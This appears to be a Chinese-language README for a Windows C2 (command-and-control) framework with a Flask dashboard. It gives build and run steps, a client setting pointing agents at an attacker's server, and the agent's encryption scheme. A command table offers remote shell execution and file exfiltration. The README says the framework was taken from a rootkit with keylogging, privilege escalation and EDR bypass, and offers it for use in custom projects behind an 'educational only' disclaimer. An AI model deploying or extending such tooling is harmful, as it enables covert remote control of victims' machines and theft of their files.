
基于 HTTPS 的命令与控制基础设施,附带 Web 仪表板,用于远程 Windows 代理管理。
⚠️ 仅限教育用途 - 非法使用后果自负。
服务端:
cd server
pip install flask
python c2_server.py
访问仪表板:https://localhost:8443
客户端:
build.bat
编辑 client/c2_client.cpp 设置服务器 IP:
wstring c2ServerUrl = L"https://YOUR_SERVER_IP:8443";
加密: XOR + Base64
密钥: Hostname + Username + "SecretKey2025"
传输: HTTPS(端口 8443)
Agent → POST /api/checkin → Server (get commands)
Agent → POST /api/result → Server (send results)
服务端: Python 3.9+、Flask
客户端: MinGW-w64 GCC 15.2+、Windows SDK、C++17
该 C2 框架提取自 XvX Usermode Rootkit 项目。完整版 Rootkit 包含更全面的 C2,拥有超过 15 条命令,涵盖进程/文件/注册表隐藏、SYSTEM 权限提升、交互式反向 Shell、键盘记录功能、DLL 注入以及 EDR 绕过技术。此独立版本提供核心 C2 基础设施,用于教育目的并方便集成到自定义项目中。
作者: 28zaakypro[@]proton[.]me
| 命令 | 语法 | 描述 |
|---|
shell | shell <cmd> | 执行 Shell 命令 |
exfil | exfil <path> | 外泄文件 (Base64) |
sleep | sleep <seconds> | 更改信标间隔 |
ping | ping | 测试连接 |
die | die | 终止代理 |